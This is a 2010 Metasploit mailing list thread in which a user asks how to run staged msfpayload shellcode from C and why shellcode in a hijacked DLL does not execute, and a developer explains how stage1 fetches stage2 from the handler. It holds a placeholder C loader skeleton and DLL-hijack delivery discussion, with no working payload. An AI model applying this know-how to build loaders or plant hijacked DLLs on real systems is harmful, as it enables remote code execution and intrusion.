Metasploit mailing list archives
Re: What is the output of msfpayload in C format
From: eski mo <eskimo.ganges () gmail com>
Date: Tue, 7 Sep 2010 21:37:34 -0700
Thanx for the info egypt, it indeed helped. I got two more query :- 1. How do i write code (between the connection of stage1 and passing of stage2 over stage1). something like look for a socket patter and then load the stage2 ?. Tried surfing msf directory , but no clue. 2. when i write a shell code ( any , for eg to get cmd prompt , take from exploit-db) inside a dll, and paste the dll for dll-hijack it doesnt run. but forensics show the dll is loaded ... Regards eskim0 On Tue, Sep 7, 2010 at 8:56 AM, <egypt () metasploit com> wrote:
The first stage will not return, it executes the second stage. So your testing code does not need stage2 as that should come from the network. If you're using metasploit as the handler, it will be sent automatically based on your settings. If you're trying to build a client in C for handling the stage, it would have to send stage2 over the stage1 connection and then deal with whatever stage2 does (e.g. talk to a shell on the same socket). Hope this helped, egypt On Tue, Sep 7, 2010 at 12:13 AM, eski mo <eskimo.ganges () gmail com> wrote:I think i moved one step ahead , solution to my last query was that load stage1 then WAIT FOR REPLY FROM SERVER and then load stage2 .... the code goes likethis :- //////////// char stage1[] = " ...code .."; char stage2[] = " ...code.."; int (*func)(); func = (int (*)()) stage1; ////// wait for server to be ready for stage2 ////// what code will go here??? int (*func)(); func = (int (*)()) stage2; /////////// pointers plz guyz.... _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: db_autopwn command, (continued)
- Re: db_autopwn command egypt (Sep 08)
- Re: db_autopwn command John Nash (Sep 08)
- Re: db_autopwn command Spring Systems (Sep 08)
- Re: db_autopwn command egypt (Sep 08)
- Re: db_autopwn command Spring Systems (Sep 09)
- Re: db_autopwn command Jonathan Cran (Sep 09)
- Re: db_autopwn command YGN Ethical Hacker Group (Sep 09)
- Re: What is the output of msfpayload in C format Philip Sanderson (Sep 07)
- Re: What is the output of msfpayload in C format egypt (Sep 07)
- Re: What is the output of msfpayload in C format eski mo (Sep 07)